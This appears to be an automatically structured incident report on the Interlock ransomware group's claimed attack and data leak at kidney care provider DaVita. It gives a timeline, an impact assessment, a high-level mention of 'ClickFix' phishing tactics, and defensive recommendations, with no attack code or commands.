Full Report
The Interlock ransomware gang has claimed the cyberattack on DaVita kidney dialysis firm and leaked data allegedly stolen from the organization. [...]
Analysis Summary
# Incident Report: Interlock Ransomware Attack on DaVita
## Executive Summary
The healthcare provider DaVita suffered a ransomware attack starting around April 12, which was later claimed by the Interlock ransomware group. The threat actors claim to have exfiltrated approximately 1.5 terabytes of sensitive data, including patient records and financial information, after failing to reach a ransom agreement. DaVita disclosed the attack to the SEC, and the subsequent data leak prompted warnings for affected patients to monitor for suspicious activity.
## Incident Details
- Discovery Date: April 12 (Date of the ransomware attack disclosure to SEC)
- Incident Date: Commenced around April 12, 2024
- Affected Organization: DaVita (A major kidney care provider)
- Sector: Healthcare
- Geography: United States (Implied, as DaVita is a major US provider with global operations)
## Timeline of Events
### Initial Access
- Date/Time: Around April 12, 2024 (or shortly before)
- Vector: Not explicitly detailed, but Interlock has recently been using 'ClickFix' tactics (tricking targets into infecting themselves with info-stealers/RATs).
- Details: Attack resulted in a ransomware incident affecting some DaVita operations.
### Lateral Movement
- Details: Not specified in the article, but implicitly occurred to allow for data collection and exfiltration.
### Data Exfiltration/Impact
- Details: Interlock claims to have stolen **1.5 terabytes (approx. 700,000 files)** of data, including sensitive patient records, insurance information, user account details, and financial details.
### Detection & Response
- How it was discovered: DaVita internally detected the ransomware attack and disclosed it to the U.S. Securities and Exchange Commission (SEC).
- Response actions taken: DaVita stated it was investigating the impact post-attack. Subsequent data publication by the attacker indicates ransom negotiations either failed or did not occur.
## Attack Methodology
- Initial Access: Not explicitly stated, but Interlock has recently been observed using phishing techniques known as 'ClickFix' to deploy initial malware (Info-stealers, RATs).
- Persistence: Not detailed.
- Privilege Escalation: Not detailed.
- Defense Evasion: Not detailed.
- Credential Access: Not detailed, but implied necessary for large-scale data collection.
- Discovery: Not detailed.
- Lateral Movement: Unknown.
- Collection: Threat actor collected approximately 1.5 TB of data.
- Exfiltration: Data was published on the Interlock dark web data leak site (DLS).
- Impact: Deployment of ransomware (implied by ransomware group claim) and exfiltration of sensitive data.
## Impact Assessment
- Financial: Not specified (costs were not disclosed).
- Data Breach: Estimated 1.5 TB of data compromised, including sensitive patient records and financial details.
- Operational: DaVita confirmed the attack affected "some operations."
- Reputational: Damage due to the public nature of a major data leak from a healthcare provider.
## Indicators of Compromise
- Network indicators - defanged: N/A (No specific IOCs provided in the summary text).
- File indicators: N/A
- Behavioral indicators: Use of Interlock ransomware payload; potential initial deployment via info-stealers/RATs linked to 'ClickFix' tactics.
## Response Actions
- Containment measures: Not detailed, implied internal investigation and containment measures were initiated following detection.
- Eradication steps: Not detailed.
- Recovery actions: Not detailed.
## Lessons Learned
- Interlock is an evolving threat, recently shifting tactics to employ 'ClickFix' methods to infect targets with initial access tools (Info-stealers/RATs) before deploying their ransomware payload targeting Windows and FreeBSD systems.
- Targeting of critical healthcare infrastructure remains a high risk.
## Recommendations
- Organizations should audit security controls against tactics known to be used by Interlock, particularly concerning phishing campaigns that leverage 'ClickFix' social engineering to deploy initial access malware.
- Healthcare entities must rigorously enforce network segmentation and monitoring to halt lateral movement immediately upon initial compromise.
- Maintain vigilance regarding patient data exposure protocols, especially after an attack where large volumes of patient records are claimed to be stolen.